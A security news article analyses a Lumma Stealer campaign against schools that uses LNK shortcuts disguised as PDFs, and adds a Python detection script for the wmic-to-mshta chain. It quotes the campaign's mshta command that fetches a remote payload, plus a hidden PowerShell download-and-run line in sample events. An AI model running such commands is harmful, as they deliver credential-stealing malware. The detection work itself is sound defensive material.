The Lumma InfoStealer malware has been observed in a campaign that targets educational institutions with weaponized documents: LNK (Windows shortcut) files disguised as legitimate PDFs.
Opening one of these shortcuts starts a multi-stage infection chain that ends in the theft of sensitive data.
Educational networks, often less hardened against advanced attacks than corporate ones, have become prime targets for this information-stealing malware.
The attack begins with unsuspecting users downloading LNK files masquerading as academic or technical documents.
These files, upon execution, trigger a PowerShell command that connects to a remote server, launching the infection chain.
The PowerShell script is obfuscated, and its payload is encrypted with AES in CBC mode, so the malicious logic is not visible to static inspection or command-line logging until it is decrypted at runtime.
For instance, one observed command reads:
C:\Windows\System32\Wbem\wmic.exe process call create "mshta.exe https://80.76.51.231/Samarik"
This command downloads and executes additional payloads, including the Lumma Stealer executable.
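The chain above leaves a distinctive trail in process-creation telemetry: a hidden PowerShell started from Explorer (the double-clicked shortcut), wmic.exe used as a process launcher, and mshta.exe handed a remote URL, with WmiPrvSE.exe as its parent because WMI created it. The following detection logic is an added example written for this article; it is not CloudSEK's or the article's code. The events are constructed in the shape of Sysmon Event ID 1 fields (Image, ParentImage, CommandLine); the field names, file paths and the PowerShell command line are assumptions, and only the wmic/mshta command line is taken from the page.

```python
"""Detection rules for the LNK -> PowerShell -> wmic.exe -> mshta.exe chain.

Added example, not the article's or CloudSEK's code. Events below are
constructed to look like Sysmon Event ID 1 records; field names and paths
are assumptions, not real telemetry.
"""
import ntpath
import re

# Constructed sample events (not real telemetry). Only event 2's command line
# is the one quoted in the article; the rest are assumed for illustration.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Windows\System32\userinit.exe",
     "CommandLine": "explorer.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell.exe -w hidden -ep bypass -c "iex (irm http://example.invalid/stage)"'},
    {"Image": r"C:\Windows\System32\Wbem\wmic.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'wmic.exe process call create "mshta.exe https://80.76.51.231/Samarik"'},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": "mshta.exe https://80.76.51.231/Samarik"},
    {"Image": r"C:\Windows\System32\mshta.exe",   # benign: local HTA, not a URL
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"mshta.exe C:\Users\alice\Documents\local_tool.hta"},
]

DOC_EXTENSIONS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".txt"}
WMI_CHILD_LOLBINS = {"mshta.exe", "powershell.exe", "cmd.exe", "rundll32.exe", "regsvr32.exe"}

MSHTA_REMOTE_RE = re.compile(r"mshta(?:\.exe)?\s+[\"']?(?:https?|ftp)://", re.IGNORECASE)
WMIC_CREATE_RE = re.compile(r"process\s+call\s+create", re.IGNORECASE)
HIDDEN_PS_RE = re.compile(
    r"-(?:w|windowstyle)\s+hidden|-(?:ep|executionpolicy)\s+bypass", re.IGNORECASE)


def is_disguised_lnk(filename: str) -> bool:
    """True for a shortcut whose name carries a document extension before .lnk,
    e.g. 'Lecture_Notes.pdf.lnk', which Explorer displays as 'Lecture_Notes.pdf'."""
    name = filename.lower()
    if not name.endswith(".lnk"):
        return False
    stem = name[:-4]
    return any(stem.endswith(ext) for ext in DOC_EXTENSIONS)


def _basename(path: str) -> str:
    # ntpath handles Windows separators even when this runs on Linux.
    return ntpath.basename(path).lower()


def score_event(event: dict) -> list[str]:
    """Return the names of every rule the event triggers (empty list if none)."""
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")
    hits = []
    # 1. mshta.exe handed a remote URL: the stage seen in the wmic command.
    if MSHTA_REMOTE_RE.search(cmdline):
        hits.append("mshta_remote_url")
    # 2. wmic.exe used as a process launcher.
    if image == "wmic.exe" and WMIC_CREATE_RE.search(cmdline):
        hits.append("wmic_process_create")
    # 3. A process created through WMI gets WmiPrvSE.exe as its parent, so a
    #    LOLBin child of WmiPrvSE.exe is the other half of rule 2.
    if parent == "wmiprvse.exe" and image in WMI_CHILD_LOLBINS:
        hits.append("lolbin_spawned_by_wmi")
    # 4. Hidden / policy-bypassing PowerShell started directly from Explorer,
    #    which is how a double-clicked LNK's command line surfaces.
    if image == "powershell.exe" and parent == "explorer.exe" and HIDDEN_PS_RE.search(cmdline):
        hits.append("hidden_powershell_from_explorer")
    return hits


def detect(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Run every rule over a list of events; return (index, rules) for events that hit."""
    return [(i, hits) for i, e in enumerate(events) if (hits := score_event(e))]


if __name__ == "__main__":
    for idx, rules in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(rules)}  <- {SAMPLE_EVENTS[idx]['CommandLine'][:70]}")
    print("disguised shortcut:", is_disguised_lnk("Lecture_Notes.pdf.lnk"))
```

Rules 2 and 3 are deliberately paired: wmic.exe's own command line shows what it was asked to create, while the created process shows up separately with WmiPrvSE.exe as its parent, so a hunt that only looks at parent-child links between powershell.exe and mshta.exe will miss the chain. The local-HTA event is included to show that rule 1 keys on the remote URL, not on mshta.exe alone.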
The Lumma Stealer itself is a potent Malware-as-a-Service (MaaS) tool written in C. It is designed to exfiltrate a wide range of data, including browser credentials, cryptocurrency wallets, and sensitive files such as academic research or financial records.
Security analysts at CloudSEK noted that the malware employs evasion techniques such as obfuscated scripts and encrypted communications with its Command-and-Control (C2) servers.
Notably, when its hard-coded C2 servers are unreachable it falls back to an unconventional channel, retrieving the address of a live server from Steam profile pages.
Lumma Stealer Analysis
The malware’s infection mechanism includes multiple layers of obfuscation. For example, the JavaScript stage that follows the LNK (the HTA content that mshta.exe retrieves from the remote server) evaluates decrypted code held in a variable and then closes its own window so nothing is shown to the user:
eval(aeQ);
window.close();
Once decrypted, the PowerShell script downloads and executes the Lumma Stealer binary from remote servers.
The malware then scans the compromised system for files whose names contain keywords such as wallet.txt or passwords.pdf, targeting sensitive information.
To evade detection, Lumma Stealer encrypts exfiltrated data and employs event-controlled write operations. Additionally, it establishes persistence by creating registry entries and scheduled tasks.
This campaign underscores the urgent need for robust cybersecurity measures in educational institutions.
Organizations should implement proactive defenses, such as endpoint detection and response tooling that flags LOLBin chains like wmic.exe spawning mshta.exe, and user awareness programs, to mitigate the risk posed by deceptive phishing lures and weaponized documents.